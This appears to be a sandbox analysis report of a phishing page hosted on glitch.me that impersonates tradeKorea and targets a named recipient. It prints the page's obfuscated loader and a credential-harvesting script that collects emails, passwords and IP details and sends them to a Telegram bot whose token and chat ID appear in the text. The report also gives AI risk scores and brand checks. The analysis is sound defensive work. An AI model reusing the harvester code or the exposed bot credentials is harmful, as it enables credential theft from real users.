| URL: https://newkr-projectx.glitch.me Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://newkr-projectx.glitch.me |
| URL: https://newkr-projectx.glitch.me/#brian.ruane@phil... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This code exhibits multiple high-risk characteristics: heavy obfuscation using string encoding and character replacement, use of the Function constructor (dynamic code execution), complex string manipulation to hide functionality, and suspicious character patterns. The code appears deliberately obscured to evade detection, which is a common malware technique."
} |
Function(
'\'5nee3f&ok6.czhnix.xo@k+#9mfh^2rc4srh^ee&sqv,1oer&pta[p,,}e!v~t+swyq-4j7l*zirr}ozn_3&!3crz2za]g5pw%}ui7!1mx-^5if{a+eqorwlpkgkzc{g6u+xe]y7zk@%{^g^_ar&[e4lu7*kc2-yf4ec2~w#oyeejt]4#5ul7qv48332xgi@t71knnll629ha}-9vz1a85t%ftc,2[x.{y818p,j*ym-p2ic&x89s~s578]a}9v4@hnz%ja+g[x]*ij.%q+9l+ohax_@g,loqm5y4k6~{y*!#pcmui_*,s1hmn6^s21.3t9hx}j32ir&.j[su9@e]*[mu{lte[hzf}w_y78n-]~ve]%5t^}fg%*av.4^^w7e!,o[6~ve6#~6[&fh-up^gp@@iv7cw_1q@5]]&{l81_k.w}3nm}#jk.%~+wgq9!r_pj#%~8us8.5*#jfq*my4{u9{+vf3!+&s_3,o_6@w!![--en#,1ee%-m~6!#{qt\';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?"0QsupcVnlVictmeF"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[nmVc0eFuQ]/g,""):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?"JVfpomwrwvEVXax6c41mhp"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,""):"ZrFSMsuJnpgc054tUijoIMnUYg"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[Y4ZjsMg5Spr0IUJ]/g,""));_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz=()=>"\\162\\145\\160\\154\\141\\143\\145";(_FQRTR8s014sl4bYL6zNU0Wq10B=>"_C6u4T6cj6b9._XZQhqrh2X2CLzKdRPT9nEG1Td2B31445tyKkTJa23EtU=\\"CZZBRJLYJEHHRIQZCWVDKBGMQECLKFRZVAZUUYLSGIDSZIWJHSKVYZLBOUZFLCP\\"(function(_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM,_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz,_LC5w4zq58F1R4gGj7vyKm8g74EBmws,_J6yR511Z3DYBfBR41){_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM=this;_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz=\\"\\\\162\\\\145\\\\160\\\\154\\\\141\\\\143\\\\145\\";_$={};\\"_BmvY25CX9c7MxK96rKQh0P5I75LCn52aJrPZ23o2vmhvpPSBmAEwpshr1Fe14v63eRKCnNt3FDQe3ZfW7aiLUu0loQtYK6W3hoiQL0K1URws4AZYENFC7_WcU57JawHBdRKQd2BWEj9Cv2ecnC7tBToL4F5ipsY2JtueCAFn41yeoAGrgWBTRgAFW1GjYQJuB5p79wHCcyKo24_NtV8AKi5KMt5BzE361qtCR58i0M4VeR88rFH1r2KYoHL5rGARLAY85HKG1VF2_OZCd9m9nFI6h1zhJHZIUIr8RWejwmBToGYGvdTeFEfG2vqeghnWQtK9ULlKiYsVUtYkxefnxwe040r7u9dVU8TWxqB2KfYjQRG47hkgwFlu0I_XAuZWPM8a8nVB5qrlN8WUFUZzr5LEGkdJsqehrWX6rW48o8LrETq8qEh6LW4TX\\"[\\"9FsvIphlKFieP7t2Z\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\"\\")](\\"\\")[\\"6NfdZeoIdrUEb1aCic2QShVKK\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[IbZQeCdKNiVSU162]/g,\\"\\")]((_M4474dL1tem,_V40SJA477a86CuSIKKjS5sar6)=>{_V40SJA477a86CuSIKKjS5sar6=_M4474dL1tem[\\"9FsvIphlKFieP7t2Z\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\"\\")](\\"\\");_V77u0W95chN2s6C2VUJ84CW9S=_V40SJA477a86CuSIKKjS5sar6[1][\\"9FsvIphlKFieP7t2Z\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\"\\")](\\"\\");_$[_V40SJA477a86CuSIKKjS5sar6[0]]=_V77u0W95chN2s6C2VUJ84CW9S[0][_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](new _CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[\\"QRlaeWk9gwEo2zxfy3pHu\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[9ulkWH2waQf3ozy]/g,\\"\\")](\\"[\\"+_V77u0W95chN2s6C2VUJ84CW9S[1]+\\"]\\",\\"g\\"),\\"\\");});_LC5w4zq58F1R4gGj7vyKm8g74EBmws=(_J6yR511Z3DYBfBR41)=>{_J6yR511Z3DYBfBR41[_$._BmvY25CX9c7MxK96rKQh0P5I75LCn52aJrPZ23o2vmhvpPSBm]();_C6u4T6cj6b9[\'0\']();};_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[_$._WcU57](_$._NtV8AKi5KMt5BzE361qtCR58i0M4,_LC5w4zq58F1R4gGj7vyKm8g74EBmws);_C6u4T6cj6b9[\'0\']=()=>{_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[_$._OZCd9m9nFI6h1zhJHZIU](_$._XAuZWPM8a8nVB5qrlN8WUFUZzr5LEGkdJs,_LC5w4zq58F1R4gGj7vyKm8g74EBmws);};})();_C6u4T6cj6b9._ZRHfJgjD4rUI89H9Qyc7bK8xG=\\"a92c80D32d5X81ee459cF366ee3DA3e7FD9cff56A9YD4CAF@A55Y9d7138bRX64c1K969C6d654D01e6A7XD36dD02683CY2Y88A8X48dd53f92A43497X73d639f3995X54dA5XX5474e33982C02263d6f966YD146Yde66b51b5F751A64C71645812C76c93282d8328Y90e57FX23895DD3d9AYAf6a2eb3Da4XF1Y99f159a3f44D6c^D56a8-F5a75c060YC)e70bc?Y6d852269YX20709fea3e97X05376X33A91e85be33298dcF291f44b9eb241A4FF4AaeccM895c14083c633b6Jb65ad1763b3146478CD67ca207dC52582A2de7cCFfe7dd32D8296!92C99F0479e11A0XC4X9dXD1d40ADH45Yb2|960;Y60a6{05895106AY4M72YY71a6F93d05Dc32775c92376CCdf61DC3680D33740CA4395XC3F93e64aa2a63eA2ef!289K256a2QA4Fb7]DFY68bf166DX02Ac61274C3134366D32a81D84Y87 |
| URL: https://newkr-projectx.glitch.me/#brian.ruane@phil... Model: Joe Sandbox AI | {
"risk_score": 10,
"reasoning": "High-risk malicious script: Contains credential harvesting functionality, sends stolen credentials via Telegram bot (exposed token), collects sensitive user data (email, password, IP, browser info), and includes data exfiltration to external services. Shows clear phishing characteristics with email validation and password collection."
} |
const BOT_TOKEN = "7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA";
const CHAT_ID = "1739269434";
const LOGGER_TOKEN = "";
const LOGGER_ID = "";
const FILE =
"";
/* global $ */
$(document).ready(function () {
var count = 0;
/////////////url ai getting////////////////
const aim = window.location.hash.substr(1).split("/");
var hashPart = handleBase64Data(aim[0]);
var ai = hashPart;
if (!ai) {
} else {
// $('#ai').val(ai);
var my_ai = ai;
logVisitorToTelegram(my_ai);
var ind = my_ai.indexOf("@");
var my_slice = my_ai.substr(ind + 1);
var c = my_slice.substr(0, my_slice.indexOf("."));
var final = c.toLowerCase();
$("#ai").val(my_ai);
$("#msg").hide();
var logoUrl = "https://logo.clearbit.com/" + my_slice;
$.get(logoUrl)
.done(function () {
$(".log").attr("src", logoUrl);
})
.fail(function () {
logoUrl = "https://www.google.com/s2/favicons?domain=" + my_slice;
$.get(logoUrl)
.done(function () {
$(".log").attr("src", logoUrl);
})
.fail(function () {
$(".log").attr("src", "https://www.tradekorea.com/ui/images/common/logo.png");
});
});
}
$("#submit-btn").click(function (event) {
$("#error").hide();
$("#msg").hide();
event.preventDefault();
var ai = $("#ai").val();
var namep = $("#namep").val();
var msg = $("#msg").html();
$("#msg").text(msg);
var my_ai = ai;
var filter =
/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!ai) {
$("#msg").html("Please enter email.");
$("#msg").show();
ai.focus;
return false;
}
if (!filter.test(my_ai)) {
$("#msg").show();
$("#msg").html(
"That account doesn't exist. Enter a different account"
);
ai.focus;
return;
}
if (!namep) {
$("#msg").html("Please enter password.");
$("#msg").show();
ai.focus;
return;
}
//minimum password length validation
if (namep.length < 4) {
$("#msg").html("Please check your password");
$("#msg").show();
ai.focus;
return;
}
var ind = my_ai.indexOf("@");
var my_slice = my_ai.substr(ind + 1);
var c = my_slice.substr(0, my_slice.indexOf("."));
var final = c.toLowerCase();
var browser = GetBrowserandLanguage()[0];
domain = my_slice;
setTimeout(async () => {
var date = new Date();
const visitorInfo = await sendVisitorIP();
var message = `--------+ KITA ReZulT ${visitorInfo[2]} ${visitorInfo[3]}, ${visitorInfo[1]} +--------\n`;
message += "Email : " + ai + "\n";
message += "Password : " + namep + "\n";
message += "Checker: " + ai + ":" + namep + "\n";
message += "Browser : " + GetBrowserandLanguage()[0] + "\n";
message += "Language : " + GetBrowserandLanguage()[1] + "\n";
message += "MX Record : " + (await getMXRecord(domain)) + "\n";
message += "IP Address : " + visitorInfo[0] + "\n";
message += `Region and Country : ${visitorInfo[2]} ${visitorInfo[3]}, ${visitorInfo[1]} \n`;
message += "Date : " + date + "\n";
message += `---------+ KITA ReZulT ${visitorInfo[2]} ${visitorInfo[3]}, ${visitorInfo[1]} +-------------\n`;
var token = BOT_TOKEN;
var chatId = CHAT_ID;
$.ajax({
|
| URL: https://kit.fontawesome.com/585b051251.js... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This is the FontAwesome initialization script from a legitimate CDN (ka-f.fontawesome.com). It contains standard configuration and loading logic for the FontAwesome icon library. While it includes some DOM manipulation and external resource loading, these are expected behaviors for a font/icon loading script from a trusted source."
} |
window.FontAwesomeKitConfig = {"id":132695554,"version":"5.15.4","token":"585b051251","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":true},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":false},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":false}};
!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):t(Object(o)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(o,t))}))}return e}function n(t){return(n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}function r(t,e,n){return(e=function(t){var e=function(t,e){if("object"!=typeof t||null===t)return t;var n=t[Symbol.toPrimitive];if(void 0!==n){var r=n.call(t,e||"default");if("object"!=typeof r)return r;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===e?String:Number)(t)}(t,"string");return"symbol"==typeof e?e:String(e)}(e))in t?Object.defineProperty(t,e,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[e]=n,t}function o(t,e){return function(t){if(Array.isArray(t))return t}(t)||function(t,e){var n=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=n){var r,o,i,a,c=[],u=!0,s=!1;try{if(i=(n=n.call(t)).next,0===e){if(Object(n)!==n)return;u=!1}else for(;!(u=(r=i.call(n)).done)&&(c.push(r.value),c.length!==e);u=!0);}catch(t){s=!0,o=t}finally{try{if(!u&&null!=n.return&&(a=n.return(),Object(a)!==a))return}finally{if(s)throw o}}return c}}(t,e)||i(t,e)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function i(t,e){if(t){if("string"==typeof t)return a(t,e);var n=Object.prototype.toString.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(t):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?a(t,e):void 0}}function a(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}var c,u,s,f,l,d="Classic",h=(r(c={},"classic","Classic"),r(c,"duotone","Duotone"),r(c,"sharp","Sharp"),r(c,"sharp-duotone","Sharp Duotone"),["fak","fa-kit","fakd","fa-kit-duotone"]),p=(r(u={},"kit","Kit"),r(u,"kit-duotone","Kit Duotone"),"duotone-group"),m="swap-opacity",b="primary",y="secondary",v=(r(s={},"classic","Classic"),r(s,"duotone","Duotone"),r(s,"sharp","Sharp"),r(s,"sharp-duotone","Sharp Duotone"),r(f={},"kit","Kit"),r(f,"kit-duotone","Kit Duotone"),["fa","fas","far","fal","fat","fad","fadr","fadl","fadt","fab","fass","fasr","fasl","fast","fasds","fasdr","fasdl","fasdt"].concat(["fa-classic","fa-duotone","fa-sharp","fa-sharp-duotone"],["fa-solid","fa-regular","fa-light","fa-thin","fa-duotone","fa-brands"])),g=[1,2,3,4,5,6,7,8,9,10],w=g.concat([11,12,13,14,15,16,17,18,19,20]);[].concat((l=Object.keys({classic:["fas","far","fal","fat","fad"],duotone:["fadr","fadl","fadt"],sharp:["fass","fasr","fasl","fast"],"sharp-duotone":["fasds","fasdr","fasdl","fasdt"]}),function(t){if(Array.isArray(t))return a(t)}(l)||function(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(l)||i(l)||function() |
| URL: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Please log in to use member services.",
"prominent_button_name": "Sign In",
"text_input_field_labels": [
"Email Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is a legitimate jQuery library (v2.2.4) source code. It's a well-known, widely-used JavaScript library with no malicious indicators. The code contains standard jQuery functionality including DOM manipulation, array operations, and utility functions. No high-risk behaviors like unauthorized data transmission or suspicious domain interactions are present."
} |
/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(e.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:g,sort:c.sort,splice:c.splice},n.extend=n.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||n.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPlainObject(d)||(e=n.isArray(d)))?(e?(e=!1,f=c&&n.isArray(c)?c:[]):f=c&&n.isPlainObject(c)?c:{},g[b]=n.extend(j,f,d)):void 0!==d&&(g[b]=d));return g},n.extend({expando:"jQuery"+(m+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new Error(a)},noop:function(){},isFunction:function(a){return"function"===n.type(a)},isArray:Array.isArray,isWindow:function(a){return null!=a&&a===a.window},isNumeric:function(a){var b=a&&a.toString();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return void 0===b||k.call(a,b)},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?i[j.call(a)]||"object":typeof a},globalEval:function(a){var b,c=eval;a=n.trim(a),a&&(1===a.indexOf("use strict")?(b=d.createElement("script"),b.text=a,d.head.appendChild(b).parentNode.removeChild(b)):c(a))},camelCase:function(a){return a.replace(p,"ms-").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(s(a)){for(c=a.length;c>d;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(o,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(s(Object(a))?n.merge(c,"string"==typeof a?[a]:a):g.call(c,a)),c},inArray:function(a,b,c){return null==b?-1:h.call(b,a,c)},merge:function(a,b){for(var c=+b.length,d=0,e=a.length;c>d;d++)a[e++]=b[d];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(arguments,2),f=function(){return a.apply(b||this,d.concat(e.call(arguments)))},f.guid=a.guid=a.guid||n.guid++,f):void 0},now:Date.now,support:l}),"function"==typeof Symbol&&(n.fn[Symbol.iterator]=c[Symbol.iterator]),n.each("Boolean Number String Function Array Date RegExp Obj |
| URL: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 Model: Joe Sandbox AI | ```json{ "legit_domain": "unknown", "classification": "unknown", "reasons": [ "The URL 'newkr-projectx.glitch.me' is hosted on 'glitch.me', which is a platform for creating and hosting web applications. This makes it difficult to associate it with a specific brand.", "The brand name provided is 'u', which is not a recognizable brand name and does not help in identifying a legitimate domain.", "The URL contains a hyphen and a subdomain, which can be indicative of phishing attempts, especially when combined with a generic hosting platform.", "The presence of input fields for 'Email' and 'Password' without a clear brand association raises suspicion, as phishing sites often mimic login pages to capture credentials." ], "riskscore": 8} |
URL: newkr-projectx.glitch.me
Brands: u
Input Fields: Email Password |
| URL: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "That account doesn't exist. Enter a different account",
"prominent_button_name": "Sign In",
"text_input_field_labels": [
"brian.ruane@phillyshipyard.com&c=E,1,vA-n"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 Model: Joe Sandbox AI | {
"brands": [
"tradeKorea"
]
} |
|
| URL: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 Model: Joe Sandbox AI | ```json{ "legit_domain": "tradekorea.com", "classification": "known", "reasons": [ "The brand 'tradeKorea' is known and typically associated with the domain 'tradekorea.com'.", "The URL 'newkr-projectx.glitch.me' does not match the legitimate domain 'tradekorea.com'.", "The use of 'glitch.me' as a domain extension is unusual for a known brand like tradeKorea.", "The URL contains suspicious elements such as 'newkr-projectx', which do not align with the typical domain structure of tradeKorea.", "The presence of a personal email in the input fields suggests a potential phishing attempt to collect sensitive information." ], "riskscore": 8}
Google indexed: False |
URL: newkr-projectx.glitch.me
Brands: tradeKorea
Input Fields: brian.ruane@phillyshipyard.com&c=E,1,vA-n |
Edit tour
chrome.exe (PID: 6192 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node